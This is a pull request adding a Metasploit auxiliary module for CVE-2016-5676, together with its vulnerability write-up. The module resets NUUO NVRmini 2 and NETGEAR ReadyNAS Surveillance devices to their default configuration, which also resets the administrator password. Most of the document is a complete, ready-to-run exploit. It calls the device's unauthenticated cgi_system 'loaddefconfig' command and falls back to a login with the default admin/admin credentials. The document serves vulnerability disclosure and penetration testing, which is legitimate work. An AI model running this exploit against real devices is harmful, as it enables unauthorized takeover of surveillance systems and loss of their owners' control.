### PR TITLE
Add exploit for CVE 2016-5676 - Nuuo / Netgear Surveillance admin password reset

### DIFF
--- a/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
+++ b/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary
         [
           ['CVE', '2016-5676'],
           ['US-CERT-VU', '856152'],
-          ['URL', 'TODO_GITHUB_URL'],
+          ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt'],
           ['URL', 'TODO_FULLDISC_URL']
         ],
       'DefaultTarget' => 0,

--- a/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
+++ b/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
@@ -6,7 +6,7 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Auxiliary
-  
+
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
 

--- a/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
+++ b/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
@@ -6,8 +6,7 @@
 require 'msf/core'
 
 class MetasploitModule < Msf::Auxiliary
-  Rank = ExcellentRanking
-
+  
   include Msf::Exploit::Remote::HttpClient
   include Msf::Auxiliary::Report
 
@@ -33,7 +32,7 @@ class MetasploitModule < Msf::Auxiliary
           ['CVE', '2016-5676'],
           ['US-CERT-VU', '856152'],
           ['URL', 'https://raw.githubusercontent.com/pedrib/PoC/master/advisories/nuuo-nvr-vulns.txt'],
-          ['URL', 'TODO_FULLDISC_URL']
+          ['URL', 'http://seclists.org/bugtraq/2016/Aug/45']
         ],
       'DefaultTarget' => 0,
       'DisclosureDate' => 'Aug 4 2016'))

--- a/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
+++ b/modules/auxiliary/admin/http/nuuo_nvrmini_reset.rb
@@ -1,0 +1,85 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'NUUO NVRmini 2 / NETGEAR ReadyNAS Surveillance Default Configuration Load and Administrator Password Reset',
+      'Description' => %q{
+        The NVRmini 2 Network Video Recorded and the ReadyNAS Surveillance application are vulnerable
+        to an administrator password reset on the exposed web management interface.
+        Note that this only works for unauthenticated attackers in earlier versions of the Nuuo firmware
+        (before v1.7.6), otherwise you need an administrative user password.
+        This exploit has been tested on several versions of the NVRmini 2 and the ReadyNAS Surveillance.
+        It probably also works on the NVRsolo and other Nuuo devices, but it has not been tested
+        in those devices.
+      },
+      'Author' =>
+        [
+          'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
+        ],
+      'License' => MSF_LICENSE,
+      'References' =>
+        [
+          ['CVE', '2016-5676'],
+          ['US-CERT-VU', '856152'],
+          ['URL', 'TODO_GITHUB_URL'],
+          ['URL', 'TODO_FULLDISC_URL']
+        ],
+      'DefaultTarget' => 0,
+      'DisclosureDate' => 'Aug 4 2016'))
+
+    register_options(
+      [
+        Opt::RPORT(8081),
+        OptString.new('TARGETURI', [true,  "Application path", '/']),
+        OptString.new('USERNAME', [false, 'The username to login as', 'admin']),
+        OptString.new('PASSWORD', [false, 'Password for the specified username', 'admin']),
+      ], self.class)
+  end
+
+
+  def run
+    res = send_request_cgi({
+        'uri' => normalize_uri(datastore['TARGETURI'], "cgi-bin", "cgi_system"),
+        'vars_get' => { 'cmd' => "loaddefconfig" }
+    })
+
+    if res && res.code == 401
+      res = send_request_cgi({
+              'method' => 'POST',
+              'uri' => normalize_uri(datastore['TARGETURI'], "login.php"),
+              'vars_post' => {
+                'user' => datastore['USERNAME'],
+                'pass' => datastore['PASSWORD'],
+                'submit' => "Login"
+              }
+      })
+      if res && (res.code == 200 || res.code == 302)
+        cookie = res.get_cookies
+      else
+        fail_with(Failure::Unknown, "#{peer} - A valid username / password is needed to reset the device.")
+      end
+      res = send_request_cgi({
+          'uri' => normalize_uri(datastore['TARGETURI'], "cgi-bin", "cgi_system"),
+          'cookie' => cookie,
+          'vars_get' => { 'cmd' => "loaddefconfig" }
+      })
+    end
+
+    if res && res.code == 200 && res.body.to_s =~ /load default configuration ok/
+      print_good("#{peer} - Device has been reset to the default configuration.")
+    else
+      print_error("#{peer} - Failed to reset device.")
+    end
+  end
+end


### PR DESCRIPTION
Vulnerability: Administrator password reset
CVE-2016-5676
Attack Vector: Remote
Constraints: None, can be exploited by an unauthenticated attacker
Affected products / versions:
- NUUO NVRmini 2, firmware v1.7.5 to unknown (latest version v3.0.0 requires authentication)
- NUUO NVRsolo, firmware v1.7.5 to unknown (latest version v3.0.0 requires authentication)
- ReadyNAS Surveillance, v1.1.1 to v1.4.1 (affects both x86 and ARM versions, older versions might be affected)
- Other NUUO products that share the same web interface might be affected

On older versions of the firmware and in the ReadyNAS Surveillance application unauthenticated users can call the cgi_system binary from the web interface. This binary performs a number of sensitive system commands, such as the loading of the default configuration that resets the administrator password. It seems that at least versions 2.2.1 and 3.0.0 of the NVRmini 2 and NVRsolo firmware are not affected, so this vulnerability was fixed either on these or earlier versions, but ReadyNAS Surveillance is still vulnerable.

Pcap for Nuuo NVRmini v1.7.6: http://www.filedropper.com/nuuo-reset-176
Pcap for Netgear Surveillance: v1.1.1: http://www.filedropper.com/readynas-reset-111
